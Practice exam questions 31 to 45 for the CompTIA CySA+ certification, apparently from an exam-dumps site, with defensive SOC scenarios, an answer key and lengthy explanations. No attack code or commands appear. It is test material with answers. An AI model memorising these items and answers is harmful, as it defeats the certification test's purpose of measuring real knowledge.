CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 3 Q31-45

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 31

A SOC analyst observes that a database server is sending encrypted outbound traffic to an external IP address at irregular intervals. The connections originate from the SQL server process, which has not been updated recently. No unusual CPU or memory usage is observed. What is the most likely explanation, and what should the analyst do first?

A) The database is performing routine replication to a backup server; allow traffic.
B) The SQL server may be compromised and is exfiltrating sensitive data; capture network traffic and analyze the process.
C) The encrypted traffic is normal encryption for internal database queries; no action is required.
D) An antivirus update is downloading signatures; verify update server information.

Answer: B)

Explanation:

Option A describes routine replication to a backup server. While database replication can generate outbound encrypted traffic, such replication is typically predictable, occurs to known internal or cloud backup endpoints, and usually follows scheduled intervals. In this scenario, traffic is sent to an external IP with irregular intervals, which is inconsistent with standard replication patterns. Assuming the traffic is legitimate without verification risks missing malicious activity and potential data exfiltration. Relying solely on normal operational behavior can lead to undetected breaches, which may compromise sensitive database records.

Option B reflects the correct assessment. Compromised SQL servers can be leveraged to exfiltrate data to external hosts. Attackers often exploit unpatched database servers, leveraging administrative privileges to extract sensitive information without triggering obvious system performance anomalies. Encrypted outbound traffic makes detection more challenging because standard inspection tools may not decrypt the payload. The analyst’s priority should be to capture the traffic for analysis while preserving the integrity of the database server for forensic evaluation. Monitoring the SQL process can reveal unusual queries, timing patterns, or modifications in stored procedures used to extract and transmit data. Correlating network traffic with endpoint telemetry and SIEM alerts can help identify whether the activity is isolated or part of a broader compromise. Once captured, analysts can decode the traffic if possible, identify the scope of potential data loss, and determine whether lateral movement has occurred. Containment may include blocking the external IP at the firewall or segmentation until the investigation is complete. Additionally, reviewing patch history and configuration compliance ensures that any vulnerabilities exploited for compromise are remediated. This approach allows evidence preservation, containment of active threats, and targeted mitigation without unnecessarily disrupting operations.

Option C suggests that encrypted outbound traffic is normal for internal queries. While encryption is common for client-to-server and server-to-server database communication, such encryption usually occurs over specific ports and predictable destinations within the enterprise or approved cloud environments. Traffic to an external IP with irregular timing and no documented business purpose should be treated as suspicious until proven otherwise. Treating it as normal could result in sensitive data being exfiltrated undetected.

Option D proposes that the traffic is related to antivirus signature updates. Antivirus updates generally connect to trusted vendor domains or cloud infrastructure at predictable intervals. Traffic originating from the SQL server process is not typical behavior for antivirus software. Assuming this is the case without verification could result in the compromise persisting unnoticed.

The reasoning for selecting option B is based on several critical observations. First, irregular outbound encrypted traffic to an external IP from a high-value target like a database server is inherently suspicious, particularly when originating from the primary database process. Second, the SQL server has not been recently updated, presenting a likely attack surface for exploitation. Third, the absence of CPU or memory anomalies is consistent with sophisticated attackers using stealthy methods, such as low-volume exfiltration, to avoid detection. Analysts must treat these indicators as potential compromise signals and prioritize evidence collection, traffic analysis, and endpoint inspection. Memory and process inspection, coupled with packet capture and decryption if feasible, will allow the team to understand the scope of the exfiltration and identify compromised accounts, stored procedures, or malicious scripts. Coordination with network and endpoint teams ensures that containment actions do not disrupt legitimate business operations unnecessarily while addressing the immediate threat.

In conclusion, the most appropriate response involves identifying and isolating potential compromise, capturing relevant traffic, analyzing process behavior, and coordinating containment while ensuring evidence preservation. This systematic approach mitigates the risk of data loss, prevents lateral spread, and provides actionable information for remediation and future monitoring.

Question 32

A security analyst observes that several endpoints are performing repeated authentication attempts to network file shares using service accounts during off-hours. The attempts fail due to incorrect credentials, and the source IPs rotate among internal subnets. What is the most likely cause, and what is the recommended response?

A) Normal credential caching attempts by users; ignore the activity.
B) An internal brute-force attack targeting service accounts; analyze authentication logs and enforce account lockout policies.
C) Scheduled backup jobs attempting network access; verify configuration.
D) Temporary network misconfiguration causing retries; correct network settings.

Answer: B)

Explanation:

Option A posits normal credential caching by users. While operating systems may retry cached credentials after a password change, this behavior is typically localized to the user’s endpoint and is limited in scope. The scenario describes repeated failures targeting service accounts across multiple subnets, which is inconsistent with routine user behavior. Ignoring this activity could allow unauthorized access to service accounts and potentially privileged systems, which represents a high-risk scenario.

Option B is the correct assessment. Internal brute-force attacks targeting service accounts often involve repeated login attempts with different credentials or combinations across multiple endpoints. The rotation of source IPs among internal subnets indicates attempts to bypass account lockout policies and avoid detection thresholds in centralized logging systems. Analysts should prioritize reviewing authentication logs to determine the scope of attempted attacks, identify affected accounts, and monitor for successful logins. Enforcement of account lockout policies for service accounts, review of password strength, and enabling multifactor authentication are essential to prevent compromise. Network segmentation and anomaly detection rules may also help contain internal attacks by isolating endpoints exhibiting suspicious authentication patterns. Correlating this activity with SIEM alerts and endpoint telemetry ensures that no lateral movement or exploitation occurs.

Option C suggests that scheduled backup jobs are attempting network access. Backup services usually operate under a dedicated account, connect to well-known endpoints, and follow a defined schedule. The observed behavior—failed logins, rotation across subnets, and off-hours timing—does not match legitimate backup activity. Assuming this is routine could result in an unnoticed internal compromise.

Option D implies that a temporary network misconfiguration is causing retries. While misconfigurations can cause authentication errors, the widespread and repeated nature of the failed attempts across multiple service accounts and subnets indicates deliberate behavior rather than a temporary networking issue. Correcting network settings alone would not prevent potential brute-force attacks.

The rationale for selecting option B involves several factors. First, the activity targets service accounts, which typically have elevated privileges and are attractive to attackers. Second, the failures occur off-hours, suggesting attackers are attempting to exploit periods of low monitoring. Third, the use of multiple internal IPs indicates knowledge of security controls and attempts to circumvent lockouts or anomaly detection thresholds. Immediate response requires a multi-pronged approach: analyzing authentication logs to determine which accounts and subnets are affected, applying account lockouts or temporary credential resets to limit the attack surface, monitoring endpoints for lateral movement attempts, and enhancing detection through SIEM correlation and endpoint monitoring. Remediation also includes reviewing password policies, auditing service account usage, and applying multifactor authentication wherever feasible.

This approach ensures the security team accurately identifies and mitigates internal brute-force threats while preserving evidence and preventing further compromise. Early detection and rapid containment are critical to safeguarding privileged accounts and sensitive resources from unauthorized access.

Question 33

During network monitoring, analysts notice multiple endpoints communicating with an external IP using ICMP with payloads larger than typical ping requests. The communication occurs at consistent intervals over several days. What is the likely cause, and what should the SOC do first?

A) Routine network testing; ignore the traffic.
B) Covert data exfiltration using ICMP tunnels; capture traffic and isolate endpoints.
C) Misconfigured monitoring tools; update monitoring configuration.
D) Standard antivirus heartbeat communication; verify with vendor documentation.

Answer: B)

Explanation:

Option A suggests routine network testing. While ICMP is used for ping and connectivity checks, typical network tests involve short payloads, occur sporadically, and target known endpoints. Large payloads at consistent intervals over several days are not characteristic of standard testing and suggest deliberate, potentially malicious activity. Ignoring this traffic risks allowing covert communication to continue undetected.

Option B is correct. ICMP tunnels are a known method for covert exfiltration or command-and-control communication. Attackers often encapsulate data within ICMP payloads because such traffic frequently bypasses firewall restrictions, monitoring tools, and intrusion detection systems. The persistent, interval-based nature of the communication indicates beaconing, which is consistent with malware trying to maintain contact with an external server while remaining low-profile. Immediate SOC actions should include capturing network traffic for analysis, decoding ICMP payloads to identify transmitted data, and isolating affected endpoints to prevent lateral spread. Identifying the source process on the endpoint is critical to understand persistence and further attack mechanisms. Threat intelligence feeds may help determine whether the external IP is associated with known malware infrastructure. Follow-up actions include deploying firewall or IDS rules to block the malicious host, performing endpoint forensics, and reviewing similar hosts for compromise. Capturing evidence before blocking is essential to preserving forensic integrity and supporting subsequent investigations or legal processes.

Option C posits misconfigured monitoring tools. While monitoring tools can generate ICMP traffic, they are unlikely to produce large payloads with consistent, persistent intervals to unknown external IPs. Assuming misconfiguration without analysis may overlook a real security incident.

Option D suggests standard antivirus heartbeat communication. Antivirus heartbeat communications typically use TCP or UDP on well-known ports to reach vendor infrastructure. ICMP is not a common protocol for signature updates or telemetry reporting, making this explanation improbable.

The reasoning for choosing option B relies on understanding ICMP tunneling behavior, traffic patterns, and endpoint processes. Persistent, interval-based, large-payload ICMP traffic to an external host is a textbook indicator of covert exfiltration or malware beaconing. Capturing and analyzing network traffic while isolating endpoints ensures containment and evidence collection. By mapping the endpoints and processes involved, analysts can identify the malware family, understand the attack vector, and implement targeted remediation measures. ICMP tunneling is particularly stealthy, so early detection and containment prevent sensitive data loss and mitigate risk to other systems.

Question 34

During routine endpoint monitoring, a SOC analyst discovers that a workstation is executing a script that attempts to disable logging services while simultaneously connecting to multiple external IPs over non-standard TCP ports. No alerts were triggered by the antivirus. What is the most likely scenario, and what should be the immediate response?

A) Legitimate administrative maintenance script; allow execution.
B) Malware attempting to establish persistence and exfiltrate data; isolate the workstation and perform memory and disk forensics.
C) Scheduled system monitoring tool misconfiguration; correct the configuration.
D) Endpoint testing by IT staff; notify staff and approve execution.

Answer: B)

Explanation:

Option A suggests that the activity is a legitimate administrative script. Legitimate administrative scripts typically run under documented accounts, do not attempt to disable logging, and connect only to known destinations using standard ports. The behavior described—disabling logging services and connecting to unknown external IPs over non-standard TCP ports—is inconsistent with legitimate administration and strongly indicates malicious intent. Allowing this activity could result in undetected persistence, data exfiltration, or lateral movement across the network.

Option B reflects the correct assessment. Disabling logging is a classic technique employed by attackers to evade detection. Establishing external connections over non-standard ports suggests attempts to communicate with command-and-control infrastructure, often bypassing traditional firewall rules or intrusion detection alerts. The lack of antivirus detection indicates that the malware is either fileless, obfuscated, or using zero-day techniques. Immediate response requires isolating the affected workstation to prevent further compromise or lateral movement. Memory forensics is critical to capture active in-memory processes, injected code, or PowerShell scripts, while disk forensics identifies persistent artifacts such as scheduled tasks, registry modifications, or startup entries. Network traffic should be captured to identify external destinations, decode payloads, and determine the type of data potentially exfiltrated. Analysts can also cross-reference external IPs with threat intelligence feeds to determine the attacker’s infrastructure, malware family, or tactics, techniques, and procedures (TTPs). Subsequent remediation involves cleaning the endpoint, reviewing similar endpoints for signs of compromise, and enhancing detection capabilities through endpoint monitoring and firewall rules. This response balances containment with evidence preservation and allows for a full understanding of the attack vector, minimizing further risk.

Option C proposes misconfiguration of monitoring tools. Misconfigurations can generate unusual traffic or logs, but they do not typically include attempts to disable logging or connect to unknown external hosts over non-standard ports. Assuming this behavior is benign without investigation could allow an ongoing compromise to persist.

Option D suggests IT testing. IT activities are usually authorized, documented, and performed during scheduled maintenance windows. The obfuscation, stealthy behavior, and network traffic to unknown destinations indicate malicious activity rather than routine testing.

Selecting option B prioritizes early detection and containment of sophisticated malware. Disabling logging combined with non-standard external connections demonstrates an attacker’s intent to evade monitoring and maintain control. Capturing forensic evidence enables analysts to identify the malware, understand the attack chain, and implement targeted remediation measures. This approach ensures that compromised endpoints are effectively isolated while preserving data for post-incident analysis and improving detection for future threats.

Question 35

A network administrator notices several endpoints repeatedly sending HTTP POST requests containing small, encrypted payloads to an unknown external domain. The activity occurs primarily during non-business hours. What is the most likely threat, and what is the recommended immediate action?

A) Routine application telemetry; allow the traffic.
B) Covert data exfiltration via HTTP; capture traffic, isolate endpoints, and analyze payloads.
C) Standard antivirus updates over HTTP; verify vendor update sources.
D) Internal user testing; notify users to stop.

Answer: B)

Explanation:

Option A posits that the activity is routine application telemetry. While applications do send telemetry data, it is generally sent to known vendor endpoints and in predictable intervals. Encrypted payloads, unknown destinations, and timing during non-business hours are not consistent with normal telemetry behavior. Assuming the traffic is benign risks ignoring potential data exfiltration or malware communication.

Option B is correct. Small, encrypted HTTP POST requests to unknown domains are indicative of covert data exfiltration. Attackers often use HTTP to blend with normal web traffic, making detection challenging. Non-business hour activity suggests attempts to evade monitoring and capture sensitive data without drawing attention. Immediate SOC response includes isolating affected endpoints to prevent further exfiltration, capturing network traffic for analysis, and decoding payloads to determine the type of data being transmitted. Endpoint analysis can identify processes responsible for initiating the traffic, uncover malware persistence mechanisms, and allow remediation. Blocking the external domain and updating intrusion detection signatures helps prevent recurrence. Cross-referencing threat intelligence sources can provide context on the external domain, including whether it is part of a known attacker infrastructure or botnet. Containment while maintaining evidence ensures both operational continuity and forensic readiness.

Option C assumes standard antivirus updates. Antivirus vendors generally distribute updates via trusted domains or cloud services using standard HTTPS connections. Unknown domains and encrypted payloads over HTTP suggest malicious behavior rather than legitimate antivirus activity.

Option D implies internal testing. User testing would typically be limited to a small number of endpoints, involve known domains, and be documented. The described widespread, off-hour activity with encrypted payloads is inconsistent with routine internal testing.

The reasoning behind choosing option B involves multiple indicators: timing, encryption, unknown external destinations, and the method of communication (HTTP POST). These factors collectively point toward covert exfiltration attempts. Capturing network traffic and analyzing endpoint processes allows analysts to understand the nature of the threat, the scope of data compromise, and attacker TTPs. Isolation ensures that the compromise does not spread while evidence is preserved. Subsequent remediation involves cleaning infected endpoints, blocking malicious traffic, applying patches, and strengthening monitoring for similar activities. Proactive detection and containment are critical to mitigating risk and preventing sensitive data loss.

Question 36

A SOC analyst observes unusual lateral movement activity within the network: multiple endpoints are accessing shared directories using previously unused administrative accounts. Access attempts include copying small files repeatedly and occur outside normal business hours. What is the most likely scenario, and what should the analyst do first?

A) Routine file synchronization; allow activity.
B) Internal reconnaissance by malware or compromised accounts; monitor and isolate affected hosts while reviewing logs.
C) Backup jobs misconfigured; correct schedules.
D) Users performing legitimate off-hours tasks; notify users.

Answer: B)

Explanation:

Option A suggests routine file synchronization. File synchronization typically involves predictable intervals, known accounts, and known endpoints. Observing new administrative accounts being used for repeated small file access outside business hours indicates unusual behavior inconsistent with normal operations. Ignoring this activity could allow malware to perform lateral reconnaissance and exfiltration.

Option B reflects the correct assessment. The use of previously unused administrative accounts, off-hours activity, and repeated small file transfers are classic indicators of malware performing internal reconnaissance to map network resources and gather data. Initial response should involve monitoring network traffic, isolating affected hosts to prevent further lateral movement, and reviewing access logs for both endpoints and shared directories. Determining which accounts are compromised, assessing the files accessed, and correlating with SIEM alerts or endpoint telemetry helps in understanding the scope of the compromise. Forensic analysis may uncover malware persistence mechanisms, such as scheduled tasks or injected processes. Containment and remediation prevent further spread while preserving evidence for investigation. Following containment, updating account management policies, enforcing multifactor authentication, and auditing administrative account use ensure similar attacks are detected and mitigated in the future.

Option C suggests misconfigured backup jobs. Backup processes usually operate under known accounts, at documented intervals, and often involve larger file transfers. Repeated small file access with new administrative accounts outside normal schedules is inconsistent with backup behavior. Treating it as a backup misconfiguration risks missing an active compromise.

Option D implies legitimate user activity. Off-hours tasks using previously unused administrative accounts are highly unlikely to be normal and require verification. Assuming legitimacy could result in overlooked malicious activity and compromise of critical assets.

The rationale for selecting option B centers on recognizing behavioral indicators of compromise: new accounts, off-hours access, repeated small file transfers, and lateral movement patterns. Prompt containment, monitoring, and log review allow analysts to identify the root cause, scope of compromise, and preventive measures. This approach ensures network security while minimizing operational disruption.

Question 37

A security analyst observes that several endpoints are making outbound HTTPS connections to a newly registered domain with no associated reputation. The endpoints are sending small, encrypted payloads at irregular intervals. No other network activity is present from these hosts. What is the most likely threat, and what should the SOC do first?

A) Normal application updates; allow traffic.
B) Malware establishes a command-and-control (C2) channel; captures network traffic, isolates endpoints, and analyzes payloads.
C) Antivirus updates from a new vendor; verify update source.
D) User-initiated cloud file uploads; notify users.

Answer: B)

Explanation:

Option A suggests normal application updates. Legitimate updates are usually sent to well-known vendor domains and occur at predictable intervals. Random, small, encrypted payloads sent to newly registered, low-reputation domains are inconsistent with routine updates. Ignoring this could allow attackers to maintain covert control.

Option B is correct. Small, encrypted, outbound HTTPS traffic to a newly registered domain is a strong indicator of malware establishing a C2 channel. Irregular intervals suggest the malware is using beaconing techniques to evade detection. The immediate action should be to capture network traffic for forensic analysis to identify what data, if any, is being exfiltrated. Isolating endpoints prevents lateral movement or further external communication. Payload analysis helps determine malware type and potential infection vector. Analysts should also cross-reference the external domain with threat intelligence sources to identify related campaigns or infrastructure. Additionally, reviewing endpoint processes and running services can reveal persistence mechanisms, unauthorized scripts, or injected code. Following isolation and analysis, remediation involves removing malware, updating detection rules, and monitoring other endpoints for similar behavior. This approach balances containment, evidence preservation, and operational continuity.

Option C proposes antivirus updates from a new vendor. Antivirus updates generally occur for known vendor URLs, not newly registered domains. Encrypted payloads over HTTPS from endpoints with no other network activity make this explanation improbable.

Option D implies user-initiated cloud uploads. Legitimate user uploads are typically predictable, occur via known services, and do not employ irregular encrypted payloads to unknown domains. Assuming benign behavior without analysis risks allowing persistent malware communication.

The rationale for selecting option B is based on behavioral indicators: newly registered domains, encrypted outbound traffic, irregular intervals, and lack of other activity. Capturing and analyzing traffic while isolating affected endpoints ensures containment and forensic integrity. Identification of malware type and C2 communication allows targeted remediation, mitigation of further compromise, and strengthening of detection capabilities. Early intervention prevents data loss, lateral spread, and long-term persistence in the network.

Question 38

A SOC team observes repeated failed RDP login attempts across multiple Windows servers. The attempts originate from multiple IP addresses outside the organization and target accounts with administrative privileges. What is the most likely threat, and what should the immediate action be?

A) Routine failed logins; ignore activity.
B) External brute-force attack targeting administrative accounts; implement IP blocking, enforce account lockout policies, and enable multi-factor authentication.
C) User misremembering credentials; notify users.
D) Misconfigured monitoring system; adjust logging thresholds.

Answer: B)

Explanation:

Option A suggests routine failed logins. While failed logins occur normally, multiple external IPs targeting administrative accounts simultaneously, especially from outside the organization, indicate a coordinated attack rather than normal behavior. Ignoring such activity exposes critical accounts to compromise.

Option B is correct. Repeated failed RDP logins from external IPs targeting administrative accounts represent an external brute-force attack. Attackers often attempt to gain access by guessing passwords or leveraging leaked credentials. Immediate action should include blocking the attacking IPs at the firewall, enforcing account lockout policies to prevent repeated guessing, and enabling multi-factor authentication (MFA) to add a layer of security. Reviewing server logs and SIEM alerts helps identify potentially compromised accounts or endpoints. Analysts should also examine authentication patterns for any signs of successful compromise or lateral movement attempts. By correlating IPs with threat intelligence sources, SOC can determine if the attack is part of a known botnet or threat campaign.

Option C suggests user misremembering credentials. While possible, the scale and pattern—multiple servers, multiple IPs, administrative accounts—make this explanation highly unlikely. Treating it as a benign user error could allow attackers to successfully gain access.

Option D proposes misconfigured monitoring systems. Incorrect logging settings do not generate actual login attempts; the observed pattern reflects genuine authentication activity. Assuming misconfiguration without investigation risks overlooking an ongoing attack.

The reasoning for choosing option B emphasizes the severity of attacks targeting administrative accounts. Early containment through IP blocking and MFA enforcement mitigates risk while forensic analysis ensures accurate assessment of any compromise. Addressing the threat promptly prevents unauthorized access, protects sensitive systems, and strengthens security controls against future attacks.

Question 39

During threat hunting, analysts identify endpoints with unusually high volumes of DNS requests to non-corporate domains. Many queries contain extremely long subdomains, and some responses appear encoded. What is the most likely cause, and what immediate steps should be taken?

A) Normal DNS lookups; no action required.
B) DNS tunneling used for covert data exfiltration; monitor traffic, capture payloads, and isolate affected hosts.
C) Misconfigured internal DNS server; update server configuration.
D) Routine antivirus DNS queries; verify vendor documentation.

Answer: B)

Explanation:

Option A suggests normal DNS lookups. Typical DNS queries involve standard domain names with predictable structures. Extremely long subdomains and encoded responses deviate from normal behavior, particularly when originating from multiple endpoints, indicating anomalous activity. Assuming it is a normal risk of missing potential data exfiltration.

Option B is correct. DNS tunneling is a common method attackers use to exfiltrate data or maintain command-and-control channels. Large or encoded payloads embedded in subdomain requests allow sensitive information to bypass traditional firewall and IDS protections. Immediate response involves capturing network traffic for analysis, isolating affected endpoints, and decoding payloads to determine the type of data transmitted. Reviewing endpoint telemetry and identifying the processes generating the DNS traffic helps uncover malware persistence mechanisms. Analysts should also cross-reference domains with threat intelligence to identify known malicious infrastructure. Containment may include blocking malicious domains at DNS servers and updating security controls to detect future tunneling attempts. Detailed forensic evidence is preserved to understand the attack methodology and inform remediation actions.

Option C suggests misconfigured DNS servers. Misconfigurations typically cause failed lookups or delays, not persistent, high-volume encoded queries. Treating this as a misconfiguration would fail to detect ongoing exfiltration.

Option D proposes routine antivirus queries. While some antivirus solutions query domains, such queries are generally predictable, directed at known vendor domains, and not encoded. Assuming benign activity may allow persistent compromise.

Choosing option B ensures detection and mitigation of sophisticated exfiltration techniques. Early capture and analysis allow understanding of the attack scope, identification of affected endpoints, and strengthening of security controls to prevent recurrence.

Question 40

A SOC analyst notices a Linux server executing scripts that download files from untrusted sources and run them directly in memory without writing to disk. No alerts are triggered by endpoint security. What type of threat does this indicate, and what is the recommended response?

A) Routine software installation; allow execution.
B) Fileless malware using memory-based execution; isolate the server, perform memory forensics, and analyze scripts.
C) Misconfigured automation script; update script repository.
D) Legitimate patching process; verify with the system administrator.

Answer: B)

Explanation:

Option A assumes routine software installation. Legitimate installation processes typically involve signed binaries, trusted sources, and persistent disk artifacts. Execution directly in memory from untrusted sources is suspicious and inconsistent with standard IT procedures. Ignoring it could allow malware to maintain persistence and evade detection.

Option B is correct. Fileless malware operates in memory to bypass traditional endpoint security, leaving minimal disk traces. Indicators include scripts downloading files from untrusted sources, in-memory execution, and a lack of alerts. Immediate action involves isolating the server to prevent lateral movement and potential data exfiltration. Memory forensics allows investigators to capture running processes, injected scripts, and runtime payloads. Analyzing scripts identifies malicious behavior, payload characteristics, and persistence mechanisms. Additionally, threat intelligence can provide insights into the malware family or campaign. Remediation includes cleaning infected endpoints, updating detection signatures, and monitoring for similar activity on other servers.

Option C suggests misconfigured automation scripts. While misconfigurations can lead to unexpected script execution, downloading untrusted files and executing in memory is highly unusual and indicative of malicious activity. Assuming this explanation risks missing an active compromise.

Option D proposes a legitimate patching process. Patching processes are documented, signed, and predictable. Fileless execution of untrusted downloads without alerts is not consistent with standard patch management.

Selecting option B prioritizes containment, forensic investigation, and mitigation of advanced threats. Early isolation and analysis prevent further compromise and enable detection of similar attacks across the network.

Question 41

An analyst identifies repeated failed authentication attempts on cloud-based accounts originating from IP addresses in multiple countries. The accounts targeted include privileged roles. What is the most likely threat, and what is the recommended response?

A) User mistyped credentials; notify users.
B) Credential-stuffing attacks targeting cloud accounts; block offending IPs, enable MFA, and review logs for successful logins.
C) Normal login retries from mobile devices; allow activity.
D) Cloud service misconfiguration; update account settings.

Answer: B)

Explanation:

Option A suggests user errors. While users may occasionally mistype credentials, the volume, global IP distribution, and targeting of privileged accounts indicate deliberate malicious activity rather than routine mistakes. Ignoring this would risk account compromise.

Option B is correct. Credential-stuffing attacks involve using stolen or guessed credentials to gain access to accounts. Targeting privileged roles amplifies risk by potentially granting attackers administrative access. Immediate response involves blocking offending IP addresses, enabling multi-factor authentication, and monitoring logs for successful authentication attempts. Threat intelligence feeds can identify attacker infrastructure. Analysts should also enforce strong password policies and review account activity for anomalies. This approach mitigates account compromise risk while preserving evidence for investigation.

Option C assumes normal mobile retries. Legitimate retries are limited in scope, originate from known devices or geographies, and rarely target multiple privileged accounts simultaneously. Treating this activity as normal ignores the threat.

Option D proposes cloud misconfiguration. Misconfiguration does not produce repeated failed authentication attempts from global IPs. Assuming misconfiguration alone fails to address active attacks.

Selecting option B ensures the timely mitigation of credential-based attacks, safeguards privileged accounts, and prevents unauthorized access to sensitive cloud resources.

Question 42

A SOC analyst observes multiple Windows endpoints executing PowerShell scripts that modify registry keys and disable security services. Scripts are obfuscated and connect to external IPs over TCP 8080. Antivirus has not detected the activity. What is the most likely threat, and what is the immediate response?

A) Legitimate administrative scripts allow execution.
B) Fileless malware using PowerShell to maintain persistence and C2 connectivity; isolate endpoints, capture memory, and analyze scripts.
C) System monitoring misconfiguration; update configurations.
D) User-initiated automation scripts; notify users.

Answer: B)

Explanation:

Option A suggests legitimate scripts. Administrative scripts are normally documented, signed, and follow predictable behavior. Obfuscation, registry modification, and disabling security services indicate malicious intent. Allowing this could lead to persistent compromise and data exfiltration.

Option B is correct. Fileless malware leveraging PowerShell avoids disk artifacts, making detection difficult. Registry modifications suggest persistence attempts, and connections to external IPs indicate command-and-control activity. Immediate response involves isolating endpoints to prevent lateral spread, capturing memory to analyze in-memory execution, and analyzing scripts to understand malware behavior and external communications. Endpoint telemetry review helps determine the scope and identify other affected systems. Remediation involves removing malware, restoring security services, and updating detection rules. Capturing evidence allows forensic and threat intelligence analysis.

Option C suggests monitoring misconfiguration. Misconfigurations do not explain obfuscated scripts, registry changes, or external connections, making this explanation unlikely.

Option D proposes user-initiated automation. Legitimate user scripts rarely disable security services or connect to unknown IPs. Assuming benign behavior could allow malware persistence.

Choosing option B ensures containment, forensic capture, and remediation, preventing further compromise while understanding attack methodology.

Question 43

During a threat-hunting exercise, analysts detect unusual SMB traffic from multiple endpoints to rarely accessed network shares. The activity includes reading small portions of files and attempting unauthorized writes. What is the most likely threat, and what immediate action should be taken?

A) Normal backup traffic; allow.
B) Lateral movement or internal reconnaissance by malware; isolate endpoints, review access logs, and analyze affected hosts.
C) Misconfigured scheduled tasks; correct schedules.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes backup traffic. Backup jobs typically read entire files, occur on scheduled times, and use known accounts. Reading small portions with unauthorized writes is inconsistent with backup behavior. Allowing this could facilitate malware propagation.

Option B is correct. Malware performing lateral movement often targets network shares, reads file contents for reconnaissance, and attempts unauthorized writes to test permissions or propagate. Immediate response involves isolating affected endpoints, analyzing network and file access logs, identifying compromised accounts, and performing endpoint forensics. Containment prevents further compromise and preserves evidence for investigation. Analysts can then remediate affected systems, update monitoring rules, and validate user account integrity.

Option C suggests misconfigured scheduled tasks. Such tasks usually follow predictable behavior and affect limited endpoints. Observing multiple endpoints with unauthorized activity is unlikely to be caused by misconfiguration alone.

Option D posits legitimate off-hours user activity. Off-hour use of rarely accessed shares with unauthorized writes is unusual and requires investigation. Assuming legitimacy risks undetected malware activity.

Selecting option B allows timely containment, forensic investigation, and remediation of lateral movement attempts while minimizing network risk.

Question 44

A SOC analyst identifies endpoints sending frequent DNS queries with large subdomains to external resolvers. The responses contain encoded payloads, and the queries occur during non-business hours. What is the likely cause, and what should the SOC do first?

A) Normal DNS traffic; ignore.
B) DNS tunneling used for covert exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured internal DNS server; update configuration.
D) Antivirus cloud updates; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal DNS activity. Typical queries are short, predictable, and directed to known domains. Extremely long, encoded queries during off-hours are abnormal and indicate potential malicious activity. Ignoring them risks undetected exfiltration.

Option B is correct. DNS tunneling allows malware to send sensitive data over DNS, evading traditional monitoring. Large subdomains carrying encoded payloads and off-hour activity are consistent with exfiltration. Immediate steps include capturing DNS traffic, isolating affected hosts to prevent further exfiltration, and decoding payloads to assess data at risk. Endpoint analysis identifies the processes generating queries. Threat intelligence can reveal associated malicious domains. Containment, investigation, and remediation prevent further compromise and provide actionable evidence.

Option C suggests misconfigured DNS servers. Misconfigurations rarely produce persistent, encoded traffic to external resolvers. Treating this as a benign misconfiguration risks ongoing compromise.

Option D proposes antivirus updates. Antivirus DNS queries are generally predictable and directed at known domains, making this explanation unlikely.

Selecting option B ensures timely detection, containment, and forensic analysis of potential DNS-based exfiltration.

Question 45

A SOC analyst observes multiple Linux servers establishing outbound SSH connections to unknown external hosts over non-standard ports. Traffic is low-volume but persistent. What is the most likely cause, and what is the recommended response?

A) Normal administrative remote access; allow.
B) Malicious SSH tunnels for data exfiltration or C2; capture traffic, isolate servers, and analyze connections.
C) Misconfigured automation scripts; update scripts.
D) Routine monitoring software; verify vendor sources.

Answer: B)

Explanation:

Option A assumes legitimate remote administration. Administrative SSH access typically occurs over standard ports, known IPs, and scheduled times. Persistent low-volume connections to unknown hosts over non-standard ports suggest malicious activity rather than routine maintenance.

Option B is correct. Low-volume persistent SSH connections to unknown external hosts on non-standard ports are indicative of covert tunnels used for data exfiltration or command-and-control communication. Attackers often exploit SSH to evade detection. The SOC should capture network traffic for forensic analysis, isolate affected servers to prevent lateral movement or data loss, and identify the processes initiating the connections. Payload analysis can reveal exfiltrated data or C2 instructions. Threat intelligence can provide context regarding the external IPs and associated campaigns. Endpoint analysis uncovers persistence mechanisms, unauthorized accounts, or injected processes. Remediation includes terminating malicious connections, cleaning compromised servers, updating detection signatures, and monitoring the environment for similar activity.

Option C points to the possibility of misconfigured automation scripts causing unusual activity within a system. Automation scripts, when incorrectly written or deployed, can indeed produce unintended behaviors, such as repeated task failures, error messages, or occasional unexpected network connections. These scripts typically generate predictable patterns, such as repeated attempts to reach known endpoints or generate traffic to internal or authorized systems. Administrators encountering such issues can usually trace the problem to a recent script change, parameter error, or scheduling misalignment. Misconfigurations often produce observable logs, errors, or alerts that clearly indicate where and why the script is failing, allowing remediation through debugging or parameter adjustment.

However, the scenario described in Option C exhibits characteristics that go beyond what misconfigured scripts normally produce. Specifically, the combination of non-standard ports, communication with unknown external hosts, and persistent low-volume traffic does not align with typical scripting errors. Misconfigured scripts rarely establish connections to external, unfamiliar systems in a sustained and stealthy manner. Non-standard ports are often a deliberate choice in malicious activity to evade monitoring or bypass firewalls, while persistent, low-volume traffic is a hallmark of attempts to maintain covert communication without triggering alerts. This pattern is more consistent with deliberate, unauthorized activity, such as data exfiltration or command-and-control communication, rather than accidental script behavior.

Furthermore, automation scripts rarely implement mechanisms to maintain long-term persistence or obfuscate their actions across sessions. In contrast, malicious actors often use sophisticated methods to hide their presence, including maintaining stealthy connections, rotating ports, and avoiding triggering logging systems. Therefore, while misconfigured scripts should always be investigated as a potential source of anomalies, the specific combination of indicators in this case strongly suggests that the activity is not the result of mere misconfiguration, but likely deliberate malicious behavior that requires careful forensic analysis and targeted mitigation.

Option D posits routine monitoring software. Monitoring agents typically use known domains and standard ports. The described activity suggests stealthy malicious activity rather than legitimate telemetry.

Choosing option B ensures containment, forensic capture, and remediation, preventing data exfiltration and attacker persistence.